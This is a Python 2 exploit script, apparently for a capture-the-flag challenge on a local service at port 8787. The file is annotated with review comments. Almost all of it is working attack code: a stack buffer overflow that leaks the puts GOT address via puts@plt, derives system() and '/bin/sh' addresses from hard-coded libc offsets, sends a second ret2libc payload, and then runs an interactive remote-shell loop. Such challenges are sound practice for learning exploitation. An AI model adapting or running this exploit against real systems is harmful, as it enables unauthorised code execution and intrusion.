from socket import *
from struct import *
import time
#####################################
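def until(s, string):
    """Read from socket *s* one byte at a time until *string* has been seen.

    Reading a single byte per recv() means nothing past the delimiter is
    consumed, which matters here because the caller reads raw binary
    (sock.recv(4)) immediately after the delimiter.

    Returns everything received, delimiter included.
    Raises EOFError if the peer closes the connection before *string*
    appears -- the original looped forever on the empty recv() a closed
    socket returns.
    """
    data = ''
    while string not in data:
        chunk = s.recv(1)
        if not chunk:
            # recv() returns '' once the peer has shut down the connection;
            # appending '' and looping again would never terminate.
            raise EOFError('connection closed before %r was received' % (string,))
        data += chunk
    return data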
#####################################
# Python 2 script (print statements, raw_input). `from socket import *`
# provides socket/AF_INET/SOCK_STREAM; `from struct import *` provides
# pack/unpack.
p = lambda x : pack('<L',x)        # int -> 4-byte little-endian unsigned
up = lambda x : unpack('<L', x)    # 4 bytes -> 1-tuple; callers index [0]
# Target-specific constants. The hex values are fixed 4-byte addresses in the
# target binary; the decimal values are offsets applied to the leaked puts
# address below (system_addr / binsh_addr), so they are presumably tied to the
# exact libc build on the target -- confirm before reuse.
puts_plt = 0x08048540
puts_got = 0x08049ADC
puts_system = 158960
binsh_puts = 1055912
pr = 0x08048838   # NOTE(review): defined but never referenced in this script
host = '127.0.0.1'
port = 8787
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, port))
# Stage 1: the overflow returns into puts@plt with puts@got as its argument,
# so the server writes back the runtime address stored in the GOT (a leak
# that the offsets above are then applied to).
payload = "0" * 33
payload += "A" * 292
payload += p(0x00)            # presumably the canary slot (the server's banner
                              # mentions a canary); stack layout not verifiable here
payload += "A" * 4
payload += p(puts_plt)
payload += p(0x08048614)      # return address after puts; raw constant with no
                              # name -- unclear whether `pr` above was intended
payload += p(puts_got)
sock.send(payload+"\n")       # NOTE(review): send() may transmit only part of the
                              # buffer; sendall() would be the safer call
print until(sock,"// Can you bypass the canary? ;p\n")   # echo up to the banner
puts_addr = up(sock.recv(4))[0]   # NOTE(review): recv(4) can return fewer than
                                  # 4 bytes, in which case unpack raises struct.error
system_addr = puts_addr - puts_system
binsh_addr = puts_addr + binsh_puts
print "puts_addr = "+ hex(puts_addr)
print "system_addr = "+ hex(system_addr)
print "binsh_addr = "+hex(binsh_addr)
print "=========== Stage2 ==========="
print sock.recv(1024)             # drain whatever the server sends next (<= 1 KiB)
# Stage 2: same overflow, now returning into system_addr; laid out like a
# ret2libc frame -- 4 filler bytes where system()'s own return address sits,
# then binsh_addr as its first argument (presumably; not verifiable here).
payload2 = "0" * 33
payload2 += "A" * 292
payload2 += p(0x00)
payload2 += "A" * 4
payload2 += p(system_addr)
payload2 += "A" * 4
payload2 += p(binsh_addr)
sock.send(payload2+"\n")      # NOTE(review): same partial-send caveat as above
print until(sock,"// Can you bypass the canary? ;p\n")
# Interactive loop: forward each line typed locally and print up to 1 KiB of
# the reply. recv(1024) may return a partial response, and the socket is never
# closed (the loop only ends via an exception, e.g. EOFError from raw_input).
while True:
    cmd = raw_input('$ ')
    sock.send(cmd+"\n")
    print sock.recv(1024)